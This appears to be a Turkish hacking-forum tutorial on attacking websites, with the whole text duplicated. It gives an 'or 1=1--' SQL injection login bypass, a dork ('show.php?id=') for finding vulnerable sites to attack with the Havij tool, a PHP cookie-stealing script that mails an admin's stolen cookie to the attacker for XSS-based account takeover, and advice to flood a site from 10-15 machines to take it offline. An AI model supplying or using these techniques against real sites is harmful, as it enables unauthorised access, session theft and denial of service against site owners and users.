Sql İnjection Yoluyla.
öncelikle hedef sitenin admin paneline ulaşmak istersiniz bunun için çeşitli exploitler vardır admın paneline ulaşmak için sql inj deneyebiliriz.
username: or 1=1--
şifre : or 1=1--
gibi admin paneline böyle şeyler yazarak bir ihtimalde olsa girebilme şansımız vardır daha fazlasını forumda aratarak bulabilirisniz.
Birde seçtiğimiz bir dorku arama motorunda aratıp site adresinin sonuna ' tırnak işareti koyduğuumuzda hata alırsak Havijden siteyi hackleyebiliriz.
Örnek: E-Ticaret, Web Tasarım, Hosting, Domain, Fononline Internet Hizmetleri - Siteadi.com' gibisinden dorkumuzda bu : show.php?id= tabi siz forumda arayarak çeşitli dorklar bulabilirsiniz.
Xss Yoluyla
eğer serverda html komutları açık ise admin cookisini çalarak giriş yapabiliriz.yada adminin mailine xss yollayabiliriz.
<?
$cookie = $_GET['data'];
$kime = "[email protected]";
$konu = "cookie";
mail ($kime,$konu,$cookie);
?>
bu kodu yazarak mesela.yada yönlendirme kodunu yazarakta yönlendirebiliriz siteyi başka bir adrese. xss ile ilgili geniş bilgiyi Buradan öğrenebilirsiniz.ayrıca htmlnin açık olup olmadıgını sitede mesaj yazma kısmına gelip sol alt taraflara bakarsanız oralarda yazar.
Flood Yoluyla
flood yoluyla siteyi yavaşlatabilir yada bir süreliğine kapatabilirisiniz.flood programları sitede mevcut indirerek çalıştırabilirisiniz ama eğer bu uygulamayı 10-15 tane ayrı bilgisarlardan yaparsanız daha etkili olur.
Anlatımım bu kadardı arkadaşlar herkese iyi forumlar.
öncelikle hedef sitenin admin paneline ulaşmak istersiniz bunun için çeşitli exploitler vardır admın paneline ulaşmak için sql inj deneyebiliriz.
username: or 1=1--
şifre : or 1=1--
gibi admin paneline böyle şeyler yazarak bir ihtimalde olsa girebilme şansımız vardır daha fazlasını forumda aratarak bulabilirisniz.
Birde seçtiğimiz bir dorku arama motorunda aratıp site adresinin sonuna ' tırnak işareti koyduğuumuzda hata alırsak Havijden siteyi hackleyebiliriz.
Örnek: E-Ticaret, Web Tasarım, Hosting, Domain, Fononline Internet Hizmetleri - Siteadi.com' gibisinden dorkumuzda bu : show.php?id= tabi siz forumda arayarak çeşitli dorklar bulabilirsiniz.
Xss Yoluyla
eğer serverda html komutları açık ise admin cookisini çalarak giriş yapabiliriz.yada adminin mailine xss yollayabiliriz.
<?
$cookie = $_GET['data'];
$kime = "[email protected]";
$konu = "cookie";
mail ($kime,$konu,$cookie);
?>
bu kodu yazarak mesela.yada yönlendirme kodunu yazarakta yönlendirebiliriz siteyi başka bir adrese. xss ile ilgili geniş bilgiyi Buradan öğrenebilirsiniz.ayrıca htmlnin açık olup olmadıgını sitede mesaj yazma kısmına gelip sol alt taraflara bakarsanız oralarda yazar.
Flood Yoluyla
flood yoluyla siteyi yavaşlatabilir yada bir süreliğine kapatabilirisiniz.flood programları sitede mevcut indirerek çalıştırabilirisiniz ama eğer bu uygulamayı 10-15 tane ayrı bilgisarlardan yaparsanız daha etkili olur.
Anlatımım bu kadardı arkadaşlar herkese iyi forumlar.
